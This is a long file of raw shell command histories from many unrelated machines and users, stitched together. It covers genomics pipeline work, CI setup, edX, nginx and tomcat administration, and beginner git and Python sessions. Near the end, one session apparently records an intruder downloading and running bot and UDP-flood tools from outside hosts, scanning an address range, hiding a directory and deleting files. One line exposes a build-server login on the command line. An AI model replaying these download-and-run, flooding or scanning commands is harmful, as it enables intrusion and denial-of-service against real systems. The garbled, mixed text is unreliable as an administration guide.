+ls aligned +#1357772625 +rm aligned/aligned +#1357772635 +ln -s /misc/FacilityBioinformatics/private/Illumina_HiSeq_2000_Runfolder/PG0002526-DNA_analysis/aligned aligned/ +#1357772638 +ls aligned +#1357772645 +rm aligned/aligned +#1357772650 +ls +#1357772659 +ln -s /misc/FacilityBioinformatics/private/Illumina_HiSeq_2000_Runfolder/PG0002526-DNA_analysis/aligned ./aligned +#1357772660 +ls +#1357772662 +ls aligned +#1357772665 +rm ./aligned +#1357772669 +man ln +#1357772740 +ls +#1357772751 +ln -s /misc/FacilityBioinformatics/private/Illumina_HiSeq_2000_Runfolder/PG0002526-DNA_analysis/aligned -t ./aligned +#1357772760 +man ln-s +#1357772762 +man ln +#1357772796 +ls +#1357772802 +ln -T -s /misc/FacilityBioinformatics/private/Illumina_HiSeq_2000_Runfolder/PG0002526-DNA_analysis/aligned -t ./aligned +#1357772808 +ln -T -s /misc/FacilityBioinformatics/private/Illumina_HiSeq_2000_Runfolder/PG0002526-DNA_analysis/aligned aligned +#1357772809 +ls +#1357772811 +ls aligned +#1357772818 +rm ./aligned/aligned +#1357772822 +ln -T -s /misc/FacilityBioinformatics/private/Illumina_HiSeq_2000_Runfolder/PG0002526-DNA_analysis/aligned aligned +#1357772827 +ls +#1357772830 +rm aligned +#1357772833 +ln -T -s /misc/FacilityBioinformatics/private/Illumina_HiSeq_2000_Runfolder/PG0002526-DNA_analysis/aligned aligned +#1357772834 +ls +#1357772835 +ls aligned +#1357772842 +ln -T -s /misc/FacilityBioinformatics/private/Illumina_HiSeq_2000_Runfolder/PG0002526-DNA_analysis/aligned aligned +#1357772849 +ln -Ts /misc/FacilityBioinformatics/private/Illumina_HiSeq_2000_Runfolder/PG0002526-DNA_analysis/aligned aligned +#1357772945 +ls +#1357772957 +sh linkme.sh +#1357779250 +ls +#1357779252 +#1357779253 +ls +#1357779254 +git status +#1357779258 +#1357779258 +ls +#1357779259 +git status +#1357779264 +git diff +#1357779272 +git add -u +#1357779273 +git status +#1357779359 +git commit -m "safer linking using -T" +#1357779363 +git status +#1357779367 +git add queue/ +#1357779368 +git status +#1357779379 +git commit -m "queue pipeline testing" +#1357779382 +git push origin master +#1357779704 +#1357779792 +ls /share/ClusterShare/software/contrib/kevyin/gatk/2.2-8/ +#1357779795 +ls /share/ClusterShare/software/contrib/kevyin/gatk/2.2-8/gatk_queue/ +#1357781950 +pwd +#1357782185 +sh run_queue.sh +#1357782240 +ls ../resources/gatk_queue_resources/ExampleCountReads.scala +#1357782364 +sh run_queue.sh +#1357782483 +qstat +#1357782495 +qsub -pe smp 16 +#1357782506 +qlogin -pe smp 16 +#1357797992 +sh run_queue.sh +#1357799556 +#1357799556 +ls +#1357799571 +mkdir aligned_subsamp +#1357799577 +#1357799577 +ls +#1357799584 +which samtools +#1357799598 +module load cloudbiolinux/default +#1357799678 +samtools -h +#1357799681 +samtools +#1357799686 +samtools view +#1357799762 +samtools view -b -s 0.001 ../aligned/bowtie2/PG0002526-DNA_bowtie2.bam +#1357799778 +samtools view -b -s 0.001 ../aligned/bowtie2/PG0002526-DNA_bowtie2.bam > PG0002526-DNA_bowtie2_subsamp.bam +#1357799789 +ls +#1357799792 +ll +#1357799794 +rm PG0002526-DNA_bowtie2_subsamp.bam +#1357799800 +samtools view -b -s 0.00001 ../aligned/bowtie2/PG0002526-DNA_bowtie2.bam > PG0002526-DNA_bowtie2_subsamp.bam +#1357800268 +which bwa +#1357800575 +sl +#1357800577 +#1357800577 +ls +#1357800580 +#1357800581 +ls +#1357800584 +sh run_queue.sh +#1357801008 +ls /home/kevyin/dev/analysis/ccg/PG0002526-DNA/aligned/bowtie2/PG0002526-DNA_bowtie2_dup_reord.bam +#1357801091 +sh run_queue.sh +#1357801499 +ls +#1357801507 +#1357801507 +ls +#1357801509 +vim +#1357855301 +: +#1357786931 +qstat +#1357786939 +screen -ls +#1357786955 +qstat -f -u "*" +#1357789204 +man qsub +#1357789400 +#1357789400 +ls +#1357789402 +#1357789402 +ls +#1357789469 +java -Djava.io.tmpdir=tmp -jar /share/ClusterShare/software/contrib/kevyin/gatk/2.2-8/gatk_queue/Queue.jar -S ../resources/gatk_repo_qscripts/examples/HelloWorld.scala -qsub -run +#1357789602 +cat HelloWorld.jobreport.txt +#1357789620 +cat /home/kevyin/dev/analysis/ccg/PG0002526-DNA/queue/HelloWorld-1.out +#1357789632 +qstat -f z +#1357789635 +qstat -s z +#1357792258 +which R +#1357796901 +ls +#1357797159 +java -Djava.io.tmpdir=tmp -jar /share/ClusterShare/software/contrib/kevyin/gatk/2.2-8/gatk_queue/Queue.jar +#1357797163 +java -Djava.io.tmpdir=tmp -jar /share/ClusterShare/software/contrib/kevyin/gatk/2.2-8/gatk_queue/Queue.jar -h +#1357797341 +ls +#1357797347 +rm *.out +#1357797350 +rm *.txt +#1357797351 +ls +#1357797358 +rm -r tmp/ +#1357797359 +ls +#1357797361 +sh run_queue.sh +#1357797493 +ls +#1357797502 +rm *.out +#1357797504 +rm *.txt +#1357797506 +git status +#1357797512 +git diff +#1357797525 +git add -u +#1357797540 +git commit -m "linkme consistent delimiters" +#1357797542 +git status +#1357797544 +git add run_queue.sh +#1357797545 +git status +#1357797553 +ls +#1357797559 +cat .HelloWorld-1.out. +#1357797562 +cat .HelloWorld-1.out.* +#1357797565 +cat .HelloWorld-1.out.done +#1357797567 +cat .HelloWorld-1.out.fail +#1357797571 +rm *.done +#1357797575 +ls +#1357797577 +ll +#1357797584 +rm .ExampleCountReads-1.out.done +#1357797589 +rm .HelloWorld-1.out.done +#1357797592 +rm .HelloWorld-1.out.fail +#1357797593 +ls +#1357797594 +git status +#1357797601 +git add ../linkme.sh +#1357797604 +git commit -m "linkme consistent delimiters" +#1357797607 +git add run_queue.sh +#1357797609 +git status +#1357797619 +git commit -m "run_queue.sh" +#1357797621 +git status +#1357797845 +ls +#1357797989 +screen -S queue +#1357800612 +screen -r queue +#1357798134 +qstat +#1357798138 +qstat -s z +#1357798434 +#1357798434 +ls +#1357798436 +#1357798436 +ls +#1357798439 +#1357798439 +ls +#1357798445 +#1357798446 +sl +#1357798453 +ls +#1357798457 +#1357798458 +ls +#1357798592 +qstat +#1357798600 +qstat -s z +#1357799109 +qstat +#1357799111 +qstat -s z +#1357799330 +which bwa +#1357799537 +ll +#1357799546 +#1357799546 +ls +#1357800086 +#1357800097 +#1357800098 +ls +#1357800101 +pwd +#1357800151 +ls +#1357800228 +qstat +#1357800467 +ls +#1357768914 +ls +#1357768917 +#1357768917 +ls +#1357768927 +qstat +#1357768929 +#1357768930 +ls +#1357768933 +#1357768934 +ls +#1357768934 +vim +#1357770444 +ls +#1357770445 +#1357770446 +ls +#1357770448 +#1357770448 +ls +#1357770453 +which eclipse +#1357770460 +df +#1357770472 +ls +#1357770492 +#1357770492 +ls +#1357770495 +#1357770495 +ls +#1357770498 +#1357770498 +ls +#1357770505 +git status +#1357770517 +git add run_jobs.sh +#1357770518 +ls +#1357770546 +vim +#1357770785 +git status +#1357770799 +git add run_jobs.sh -m "create_index" +#1357770806 +git add run_jobs.sh +#1357770812 +git commit -m "create_index" +#1357770815 +git status +#1357770822 +ls +#1357770825 +git status +#1357770828 +ll +#1357770840 +ls +#1357770842 +git status +#1357770863 +git log +#1357770869 +git show 3a05bb8ef2819c614a49eb98997d1d39292386e8 +#1357770943 +git status +#1357770980 +ll +#1357770985 +vim run_jobs.sh +#1357770990 +ls +#1357770992 +ll +#1357770996 +qstat +#1357771005 +rm .nfs000000005deeb8c700000109 +#1357771006 +ls +#1357771008 +git status +#1357771087 +ls +#1357771089 +#1357771090 +ls +#1357771149 +ln -s ~/dev/gatk-public/gatk/public/scala/qscript/org/broadinstitute/sting/queue/qscripts/ gatk-public-qscripts +#1357771150 +ls +#1357771152 +ls gatk-public-qscripts +#1357771155 +git add gatk-public-qscripts +#1357771337 +ln -s /share/ClusterShare/software/contrib/kevyin/gatk/2.2-8/gatk_queue/resources/ gatk-queue-resources +#1357771338 +ls +#1357771339 +#1357771339 +ls +#1357771342 +#1357771342 +ls +#1357771364 +vim linkme.sh +#1357771461 +vim +#1357771526 +ls +#1357771530 +#1357771530 +ls +#1357771534 +rm gatk-public-qscripts +#1357771538 +rm gatk-queue-resources +#1357771539 +#1357771540 +ls +#1357771541 +sh linkme.sh +#1357771547 +mkdir resources +#1357771548 +sh linkme.sh +#1357771551 +vim +#1357771562 +sh linkme.sh +#1357771568 +ls +#1357771573 +git status +#1357771575 +git add linkme.sh +#1357771586 +git rm queue/gatk-public-qscripts +#1357771587 +git status +#1357771608 +git commit -m "linkme to more resources" +#1357771757 +ls +#1357771777 +git status +#1357771780 +mkdir queue +#1357771782 +#1357771782 +ls +#1357771835 +#1357771835 +ls +#1357771839 +#1357771840 +ls +#1357771845 +#1357771847 +#1357771847 +ls +#1357771856 +ls resources +#1357771869 +#1357771869 +ls +#1357771871 +ll +#1357771882 +rm gatk* +#1357771885 +#1357771885 +ls +#1357771886 +vim +#1357771930 +sh linkme.sh +#1357771933 +ls +#1357771936 +ls resources/ +#1357771940 +vim +#1357772152 +ls +#1357772155 +sh linkme.sh +#1357772157 +vim +#1357773007 +#1357773007 +ls +#1357773008 +vim +~/.bash_profile +vi ~/.bash_profile +source ~/.bash_profile +echo $JAVA_HOME +echo $PATH +pwd +java path +clear +$JAVA_HOME/bin/java -version +echo $JAVA_HOME +clear +echo $JAVA_HOME +mvn --version +vi ~/.bash_profile +mvn --version +java --version +source ~/.bash_profile +java --version +clear +java --version +clear +java --version +exit +wgets.apache.org/dist/maven/maven-3/3.5.4/binaries/apache-maven-3.5.4-bin.tar.gz +tar -xf apache-maven-3.5.4-bin.tar.gz +mv apache-maven-3.5.4/ apache-maven/ +vim maven.sh +chmod +x maven.sh +source /etc/profile.d/maven.sh +mvn --version +clear +-path java +ls +ls +ls +ls +pwd +ls +ls +pwd +"sudo update-alternatives --config java" +WHICH JAVA +which java +ls +ls +java +ls +clear +pwd +~/.bash_profile +sudo su - +exit +yum install java-1.8.0-openjdk-devel +java --version +java version +java -version +clear +mvn --version +ls +git clone git@github.com:naren1979/maven-project.git +ls +ls +clear +ls +ls +git clone git@github.com:naren1979/maven-project.git +ls +ls -la | grep .ssh +ls +ls +rm -rf server +rm -rf webapp +rm maven-project/ +ls +rmdir maven-project/ +ls +ls -la | grep .ssh +ls +ls -la | grep .ssh +ls +rmdir maven-project/ +ls +cat id_rsa id_rsa.pub +clear +ls +cat id_rsa.pub +git clone git@github.com:naren1979/maven-project.git +clear +git clone +ls +git commit -m "Simple commit" +git commit -A +git status +git --version +git push +git init +git status +git commit -A +git commit -a +git commit -m "first commit" +git push +git push clear +clear +git status +git push +clear +git remote -v +ls +ls +git branch -a +git push origin master +clear +git push origin master +git remote -v +vi /usr/share/tomcat//conf/server.xml +clear +sudo systemctl restart tomcat +sudo systemctl enable tomcat +sudo vi /usr/share/tomcat/conf/tomcat-users.xml +sudo systemctl restart tomcat +ls +git clone git@github.com:naren1979/maven-project.git +clear +ls +ls +ls +ls +chmod 777 jenkinsfile +touch jenkinsfile +ls +vi jenkinsfile +git push +git remove -v +git remote -v +git status +git add jenkinsfile +git commit -m "jenkinspush" +git push +ls +git add jenkinsfile +vi jenkinsfile +git add jenkinsfile +git status +git commit -A +git commit -m "jenkinsjob" +git status +git push +ls +ls +vi jenkinsfile +clear +git add jenkinsfile +git commit -m "change" +git push +ls +ls +git status +git push +git remote -v +git push origin master +git clone git@bitbucket.org:dilip_prasoon/dilipprasoon.git +clear +git clonesoon@bitbucket.org/dilip_prasoon/dilipprasoon.git +ls +vi jenkinsfile +git push +git status +git add dilipprasoon/ +git status +git commit -m " commit" +git push +git push origin master +history +cat id_rsa.pub +ssh-keygen +cat /root/.ssh/id_rsa.pub +git push +git clone git@bitbucket.org:dilip_prasoon/dilipprasoon.git +clear +git push origin master +ssh -v git@bitbucket.org +clear +ls +ls +git push +clear +ls +vi dockerfile +vi jenkinsfile +git add jenkinsfile +git commit -m "jenkinscommit" +git status +git push +docker images +exit +terraform -v +exit +sudo yum install epel-release +sudo yum install ansible +docker --vaersion +docker --version +clear +sudo amazon-linux-extras install ansible2 +clear +ansible --version +sudo vi /etc/ansible/hosts +ip addr show +exit +clear +tree +sudo apt-get install tree +tree +clear +pip +sudo apt-get install pip +sudo apt-get install python-pip +ppip +pip +python-pip +clear +ls +sudo apt-get install pip +sudo apt-get install python-pip +clear +ls / +ls / +sudo apt-get install pip +touch test.txt +sudo su +ls +pwd +ls +node app.js +exit +nano .env +php artisan migrte +php artisan migrate +php artisan migrate +php artisan migrate +nano tcp_server.c +./s +jobs +kill %19 +nano tcp_server.c +./s +nano tcp_server.c +gcc -o abc kespaul_wait01.c +ls +nano aass +gcc -o abc aass +nano aass +nano aass +gcc -o abc aass.c +./abc +nano aass.c +nano vilker3_fork01.c +gcc -o vilker3_fork01 vilker3_fork01.c +./vilker3_fork01 +nano vilker3_fork01.c +gcc -o vilker3_fork01 vilker3_fork01.c +./vilker3_fork01 +nano vilker3_fork01.c +gcc -o vilker3_fork01 vilker3_fork01.c +./vilker3_fork01 +nano vilker3_fork01.c +gcc -o vilker3_fork01 vilker3_fork01.c +./vilker3_fork01 +nano vilker3_fork01.c +nano vilker3_fork01.c +nano vilker3_fork01.c +nano vilker3_fork01.c +./vilker3_fork01 +nano vilker3_fork01.c +nano vilker3_fork01a.c +gcc -o vilker3_fork01 vilker3_fork01.c +nano vilker3_fork01.c +gcc -o vilker3_fork01 vilker3_fork01.c +./vilker3_fork01 +gcc -o vilker3_fork01a vilker3_fork01a.c +./vilker3_fork01a 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/edx/app/edxapp/lms.env.json +sudo /edx/bin/supervisorctl restart all +sudo nano /edx/app/edxapp/lms.env.json +sudo /edx/bin/supervisorctl restart all +sudo nano /edx/app/edxapp/lms.env.json +sudo nano /edx/app/edxapp/edx-platform/lms/templates/login.html +sudo nano /edx/app/edxapp/edx-platform/lms/templates/main.html +sudo nano /edx/app/edxapp/lms.env.json +sudo nano /edx/app/edxapp/lms.auth.json +sudo nano /edx/app/edxapp/edx-platform/lms/templates/main.html +sudo nano /edx/app/edxapp/lms.auth.json +sudo /edx/bin/supervisorctl restart all +sudo -H -u edxapp bash +sudo nano /edx/var/log/lms/edx.log +sudo nano /edx/app/edxapp/themes/raccoongang_theme/marvel-theme-ginkgo/lms/ +ls +ls +ls +sudo nano login.underscore +ls +sudo nano views.py +sudo nano /edx/app/edxapp/lms.auth.json +sudo nano /edx/app/edxapp/lms.env.json +sudo nano /edx/app/edxapp/lms.auth.json +sudo /edx/bin/supervisorctl restart all +sudo nano /edx/app/edxapp/lms.env.json +sudo nano /edx/app/edxapp/lms.auth.json +sudo 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+sudo reboot +sudo -H -u edxapp bash +sudo nano edx.log +ls +ls +ls +sudo nano common.py +sudo -H -u edxapp bash +sudo nano common.py +sudo nano /edx/var/log/lms/edx.log +sudo nano /edx/app/edxapp/edx-platform/lms/urls.py +sudo -H -u edxapp bash +sudo nano /edx/var/log/lms/edx.log +sudo reboot +sudo nano /edx/var/log/lms/edx.log +sudo nano /edx/app/edxapp/edx-platform/lms/urls.py +sudo -H -u edxapp bash +sudo nano common.py +sudo -H -u edxapp bash +sudo /edx/bin/supervisorctl restart all +sudo nano lms.env.json +sudo nano /edx/app/edxapp/lms.env.json +sudo nano /edx/app/edxapp/cms.env.json +sudo /edx/bin/supervisorctl restart all +sudo nano navigation.html +sudo -H -u edxapp bash +cp courses_list.html courses_list_search.html +sudo cp courses_list.html courses_list_search.html +ls +sudo nano navigation.html +sudo nano urls.py +sudo nano views/views.py +ls +sudo mv courses_list_search.html courses_list22.html +sudo chown -R edxapp:edxapp courses_list22.html +sudo chmod -R u+rw courses_list22.html +sudo -H -u edxapp bash +sudo nano navigation/navigation.html +sudo nano urls.py +sudo -H -u edxapp bash +sudo nano navigation.html +sudo -H -u edxapp bash +sudo nano /edx/app/edxapp/themes/raccoongang_theme/marvel-theme-ginkgo/lms/templates/navigation/navigation.html +sudo -H -u edxapp bash +sudo nano /edx/app/edxapp/themes/raccoongang_theme/marvel-theme-ginkgo/lms/templates/navigation/navigation.html +sudo nano /edx/app/edxapp/edx-platform/lms/djangoapps/courseware/views/views.py +sudo -H -u edxapp bash +sudo nano /edx/var/log/lms/edx.log +sudo nano /edx/app/edxapp/themes/raccoongang_theme/marvel-theme-ginkgo/lms/templates/navigation/navigation.html +sudo nano /edx/var/log/lms/edx.log +sudo nano /edx/app/edxapp/themes/raccoongang_theme/marvel-theme-ginkgo/lms/templates/navigation/navigation.html +sudo nano /edx/var/log/lms/edx.log +sudo nano /edx/app/edxapp/themes/raccoongang_theme/marvel-theme-ginkgo/lms/templates/navigation/navigation.html +sudo nano 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sqlite-devel +#1518416734 +#1518416736 +ll +#1518416741 +#1518416742 +ll +#1518416745 +#1518416749 +wget +#1518416777 +ll +#1518416789 +tar -zxvf Python-3.7.0a4.tgz +#1518416825 +ll +#1518416859 +#1518416860 +ll +#1518416864 +#1518416865 +ll +#1518416874 +pwd +#1518416884 +#1518416885 +ll +#1518416893 +#1518416894 +ll +#1518416914 +sudo mv Python-3.7.0a4 /usr/local +#1518416925 +#1518416926 +sudo mv Python-3.7.0a4 /usr/local +#1518416935 +ll /usr/bin | grep python +#1518416955 +rm -rf /usr/bin/python +#1518416959 +sudo rm -rf /usr/bin/python +#1518416968 +#1518416969 +ll +#1518416973 +#1518416975 +ll +#1518416981 +./configure +#1518430696 + +#1518430702 +ping +#1518430954 +tcpdump +#1518430966 +yum install -y tcpdump +#1518430975 +sudo yum install -y tcpdump +#1518431225 +uril -ismyip.com.tw/ +#1518431232 +curl -ismyip.com.tw/ +#1518431290 +curl -i +#1518431301 +curl -I +#1518431309 +curl -v +#1518431415 +wget +#1518431423 +ll +#1518431427 +vim index.html +#1518431749 +curl -i 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+#1518504208 +rm hard,rm myfile,rm soft +#1518504217 +rm hard;rm myfile;rm soft +#1518504220 +ll +#1518504260 +touch hard soft myfile +#1518504262 +ll +#1518504267 +rm hard myfile soft +#1518504268 +ll +#1518504269 +clear +#1518506243 +who +#1518506419 +who +#1518506427 +update +#1518506429 +uptime +#1518506491 +who am i +#1518506493 +who +#1518506507 +whoami +#1518506530 +w +#1518506554 +man w +#1518506562 +w=clear +#1518506564 +clear +#1518506565 +w +#1518511002 +w +#1518698070 +pwd +#1518698072 +ll +#1518698094 +clear +#1518698097 +df -lh +#1518698106 +free -h +#1519013871 +ll +#1519013873 +pwd +#1519013875 +#1519013877 +reboot +#1519013890 +sudo reboo +#1519013896 +sudo reboot +#1519643435 +fdisk -l +#1519643440 +fdisk +#1519643587 +yum whatprovides ngix +#1519643593 +yum whatprovides nginx +#1519643605 +yum search nginx +#1519643651 +yum install -y pcre pcre-devel +#1519643655 +sudo yum install -y pcre pcre-devel +#1519643668 +clear +#1519647118 +#1519647119 +pwd +#1519647120 +ll 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--preserve-permissionswget -r -nH --level=0 --cut-dirs=9 getprod@buildprod.scm.baidu.com:/temp/data/prod-32/baidu/cop-rigel/cc-cp-client/CITASK/ra9b9452630947d6f391507311c31532d691a8245-7878088/ --user getprod --password getprod --preserve-permissions +#1521084668 +wget -r -nH --level=0 --cut-dirs=9 getprod@buildprod.scm.baidu.com:/temp/data/prod-32/baidu/cop-rigel/cc-cp-client/CITASK/rb817273c07e4998bcd8f518d31bbd0ce451ab5f3-8610048/ --user getprod --password getprod --preserve-permissions +#1521105280 +pwd +#1521105317 +#1521105318 +ll +#1521105323 +#1521105329 +#1521105330 +ll +#1521105365 +rz +#1521105398 +ll +#1521105414 +cp nginx.vim /usr/share/vim/vim74/syntax//usr/share/vim/vim74/syntax/ +#1521105424 +cp nginx.vim /usr/share/vim/vim74/syntax/ +#1521105599 +vi /usr/share/vim/vim74/filetypr.vim +#1521105611 +#1521105621 +ll |grep file +#1521105628 +vi filetype.vim +#1521105690 +sudo vi filetype.vim +#1521105757 +whereis nginx +#1521105698 +sudo vim filetype.vim +#1521105867 +sudo vim filetype.vim +#1521105896 +clear +#1521105902 +#1521105902 +ll +#1521105909 +#1521105910 +ll +#1521105915 +vim nginx.conf +#1521105940 +#1521105944 +sudo vim filetype.vim +#1521106014 +ll +#1521106015 +#1521106016 +ll +#1521106051 +#1521106051 +ll +#1521106054 +sudo vim f +#1521106060 +sudo vim filetype.vim +#1521106085 +vim /usr/local/nginx/conf/nginx.conf +#1521106106 +vi /usr/local/nginx/conf/nginx.conf +#1521106133 +pwd +#1521106172 +#1521106173 +ll +#1521106183 +reboot +#1521106194 +sudo reboot +#1521106283 +pwd +#1521106289 +ps -ef|grep nginx +#1521106294 +ps -ef|grep tomcat +#1521106299 +whereis tomcat +#1521106304 +#1521106314 +/usr/sbin/tomcat +#1521106364 +#1521106365 +ll +#1521106368 +#1521106368 +ll +#1521106378 +clear +#1521106380 +whereis tomcat +#1521106387 +#1521106388 +ll +#1521106392 +#1521106393 +ll +#1521106396 +#1521106397 +ll +#1521106398 +#1521106400 +#1521106401 +ll +#1521106404 +whereis tomc +#1521106406 +clear +#1521106410 +whereis tomcat +#1521106415 +#1521106423 +#1521106424 +ll +#1521106427 +#1521106428 +l +#1521106428 +ll +#1521106432 +clear +#1521106439 +whereis tomcat +#1521106448 +#1521106453 +#1521106458 +ll |grep tomcat +#1521106462 +tomcat +#1521106475 +systemctl tomcat start +#1521106481 +systemctl start tomcat +#1521106485 +systemctl start tomcat +#1521106495 +sudo systemctl start tomcat +#1521106496 +ll +#1521106497 +clear +#1521106501 +ps -ef|grep tomcat +#1521106521 +clear +#1521106530 +#1521106531 +#1521106535 +vim nginx.conf +#1521106557 +#1521106559 +#1521106560 +ll +#1521106567 +ll |grep nginx.vim +#1521106579 +find -name nginx.vim /\ +#1521106582 +find -name nginx.vim / +#1521106591 +find -name nginx.vim +#1521106620 +cp /home/mjoe/downloads/nginx.vim +#1521106628 +cp /home/mjoe/downloads/nginx.vim nginx.vim +#1521106635 +sudo cp /home/mjoe/downloads/nginx.vim nginx.vim +#1521106639 +ll |grep nginx +#1521106641 +clear +#1521106645 +vim nginx.vim +#1521106660 +clear +#1521106668 +#1521106673 +vim nginx.conf +#1521120817 +whereis nginx +#1521120822 +ps -ef|grep tomcat +#1521122333 +pwd +#1521122335 +ll +#1521122346 +mkdir SQ_AutoCallCar +#1521122347 +ll +#1521122350 +#1521122353 +#1521122355 +rz +#1521122378 +ll +#1521122384 +vim config.py +#1521122860 +python call.py +#1521122900 +vim config.py +#1521122913 +vim config.py +#1521122948 +python call.py +#1521122958 +vim python.py +#1521122971 +vim call.py +#1521123018 +vim config.py +#1521123037 +python call.py +#1521123081 +vim call.py +#1521123098 +python call.py +#1521123104 +vim call.py +#1521123122 +python call.py +#1521123130 +vim call.py +#1521123197 +python call.py +#1521123208 +vim call.py +#1521123216 +vim call.py +#1521123270 +ll +#1521123272 +#1521123272 +ll +#1521123277 +#1521123277 +ll +#1521123283 +#1521123284 +ll +#1521123289 +vim hello.py +#1521123309 +python hello.py +#1521123323 +#1521123324 +ll +#1521123325 +sz +#1521123332 +sz config.py +#1521128223 +java +#1521128225 +javac +#1521128227 +clear +#1521129550 +whereis startup.sh +#1521129555 +whereis tomcat +#1521129562 +#1521129563 +ll +#1521129565 +#1521129566 +ll +#1521129576 +#1521129577 +ll +#1521129581 +./server +#1521129588 +ps -ef|grep tomcat +#1521129598 +#1521129599 +ll +#1521129610 +cat tomcat.conf +#1521129620 +whereis java +#1521129735 +whereis webapps +#1521129743 +whereis ROOT +#1521129746 +#1521129748 +[wd +#1521129749 +pwd +#1521129751 +#1521129754 +#1521129755 +pwd +#1521129756 +ll +#1521129775 +curl localhost:8080 +#1521129778 +ll +#1521129823 +#1521129828 +sudo cd lost+found +#1521129829 +ll +#1521129904 +#1521129904 +ll +#1521129944 +#1521129945 +ll +#1521129984 +#1521129986 +ll +#1521129991 +#1521129993 +ll +#1521130001 +#1521130002 +ll +#1521130604 +rpm -ql tomcat6 | cat -n +#1521130612 +rpm -ql tomcat | cat -n +#1521167629 +#1521186213 +ps -ef|grep nginx +#1521186221 +ps aux|grep nginx +#1521196979 +python +#1521197330 +#1521197336 +vim my_abs +#1521197355 +ll +#1521197363 +vim my_abs.py +#1521197517 +python my_abs.py +#1521197527 +vi my_abs.py +#1521197581 +python my_abs.py +#1521197614 +vi my_abs.py +#1521197627 +python my_abs.py +#1521197633 +vi my_abs.py +#1521197687 +python my_abs.py +#1521198957 +#1521198975 +python +#1521199540 +vim my_abs.py +#1521199637 +python my_abs.py +#1521199662 +vim my_abs.py +#1521199729 +python my_abs.py +#1521199736 +vim my_abs.py +#1521199744 +python my_abs.py +#1521199750 +python +#1521199949 +vim quadratic.py +#1521200787 +python quadratic.py +#1521200808 +vim quadratic.py +#1521200857 +python quadratic.py +#1521200934 +vim quadratic.py +#1521200952 +python quadratic.py +#1521538269 +pwd +#1521538270 +ll +#1521538280 +mkdir workspace +#1521538283 +#1521538349 +touch bash2048.sh +#1521538352 +ll +#1521538355 +vim bash2048.sh +#1521538400 +sh bash2048.sh +#1521538404 +clear +#1521538412 +rm bash2048.sh +#1521538513 +rz +#1521538529 +sh bash2048.sh +#1522479146 +pwd +#1522479149 +ll +#1522479154 +#1522479155 +ll +#1522479160 +vim my_abs.py +#1522479187 +clear +#1522479189 +ll +#1522479196 +vim hello.py +#1522479241 +python hello.py +#1522479247 +vim hello.py +#1522479259 +python hello.py +#1522479557 +vim hello.py +#1522479663 +#1522479668 +pwd +#1522479672 +whereis nginx +#1522479678 +#1522479681 +clear +#1522479681 +ll +#1522479689 +#1522479693 +ll +#1522479708 +sz qxq.jpeg +#1522479760 +#1522479869 +whereis mysql +#1523260218 +pwd +#1523260220 +ll +#1523260228 +#1523260229 +ll +#1523260232 +#1523260239 +#1523260243 +sz mjoe +#1523260243 +**01000000039a32 +#1523261232 +pwd +#1523261233 +ll +#1523261238 +rz index.html +#1523261283 +sz index.html +#1523261319 +rz +#1523261322 +sz +#1523261326 +ll +#1523261333 +rz -be +#1523261466 +pwd +#1523261467 +ll +#1523261468 +rz +#1523261473 +sz index.html +#1523261504 +#1523261505 +ll +#1523261525 +sz +#1523261530 +sz --help +#1523261539 +sz -be index.html +#1523261539 +**01000000039a32 +#1523261551 +#1523261561 +sz -be index.html +#1523261597 +vim index.html +#1523261615 +sz index.html index.html1 +#1523261674 +sz --help +#1523261706 +df -lh +#1523261713 +du -lh +#1523261722 +#1523261724 +du -lh +#1523261742 +du -lh|grep mjoe +#1523261923 +#1523261926 +#1523261927 +ll +#1523261949 +rm libffi-devel-3.0.13-18.el7.x86_64.rpm -y +#1523261953 +rm -y libffi-devel-3.0.13-18.el7.x86_64.rpm +#1523261956 +rm -f libffi-devel-3.0.13-18.el7.x86_64.rpm +#1523261963 +rm -f mysql57-community-release-el7-11.noarch.rpm +#1523261982 +rm -f mysql-community-release-el7-5.noarch.rpm +#1523261991 +ls -lh +#1523262018 +rm -f Python-3.7.0b1.tar +#1523262020 +clear +#1523262023 +du -lh +#1523262041 +#1523262044 +du -lh +#1523262050 +du -lh|grep mjoe +#1523262060 +git init +#1523262067 +sudo git init +#1523262078 +git -config +#1523262085 +git --config +#1523262092 +git --help +#1523262136 +git status +#1523262223 +ll +#1523262227 +ls -a +#1523262232 +rm -f .git +#1523262238 +rm -rf .git +#1523262243 +sudo rm -rf .git +#1523262244 +clear +#1523262245 +ll +#1523262247 +#1523262249 +git inti +#1523262252 +git init +#1523262327 +git remote add origin git@github.com:Michael-Joe/origin_server.git +git add readme.txt +git commit -m "wrote a readme file" +git config --global user.name "weihui" +git config --global user.email "13811029537@163.com" +pwd +git add readme.txt +git commit -m "wrote a readme file" +git status +git status +git status +git add readme.txt +git commit -m "add readme.txt again" +git status +git diff +git diff readme.txt +git log +git diff +git diff readme.txt +git add readme.xtt +git add readme.txt +git diff +git diff readme.txt +git status +git config --list +touch gitignore +touch .gitignore +vim .gitignore +git status +git commit -m"add ss" +git status +vim .gitignore +git status +git status +vim readmeme +git status +git diff +git diff readme.txt +git status +git status +git status +git status +git status +git status +git status +git status +git push origin master +git status +git checkout master +git status +git status +rails generate uploader Sentences +rails generate model picture id:int url:string +rake routes +rails db migrate +rails db picture migrate +rails db:migrate +rake db:migrate +rails dbconsole +sudo apt-get update +git clones .vim +link .vim/vimrc.vim .vimrc +ls +cat .vimrc +vim +sudo apt-get install vim +sudo apt-get install gvim-gtk +sudo apt-get install gim-gtk +sudo apt-get install gvim.gtk +sudo apt-get install gim.gtk +sudo apt-get install vim-gtk +sudo apt-get install dos2unix +man find +find . -type f -exec dos2unix {} ';' +find . -type f -exec -f dos2unix {} ';' +find . -type f -exec dos2unix -f {} ';' +vim +dos2unix ../.vimrc +dos2unix -f ../.vimrc +vim +vim fix-line-endings +find . -type f -exec dos2unix -f {} ';'ls .. +ls .. +mv foo ./fix-line-endings.sh +mv foo .vim/fix-line-endings.sh +git status +ls +git status +gvim +exit +exit +delta +w +uname -a +passwd +w +ls +ps x +ps aux +wget zeiteam.xhost.ro/boti/segher3.tgz +tar zxvf segher3.tgz +./linux +ps x +ps aux +ps x +uname -a +ls +ls +cat /proc/cpuinfo +rm -rf * +ps x +ls +perl udp.pl +mkdir " " +ls +mkdir qu +ls +ps x +kill -9 17514 +wget zeiteam.xhost.ro/boti/segher2.tgz +tar zxvf segher2.tgz +./linux +wget zeiteam.xhost.ro/flood/udp.tgz +tar zxvf udp.tgz +perl udp.pl 0 0 +perl udp.pl 0 0 +ls +ls +cat vuln.txt +cat nobash.txt +ls +ls +ls +php -v +perl udp.pl 0 0 +wget myliftclub.com/xxxz.gz +tar zxvf xxxz.gz +./go 201.15 +ls +pwd +ls +git status +ls -a +ls +.cd ~/.git +ls +ls +ls +git init +ls +git status +git 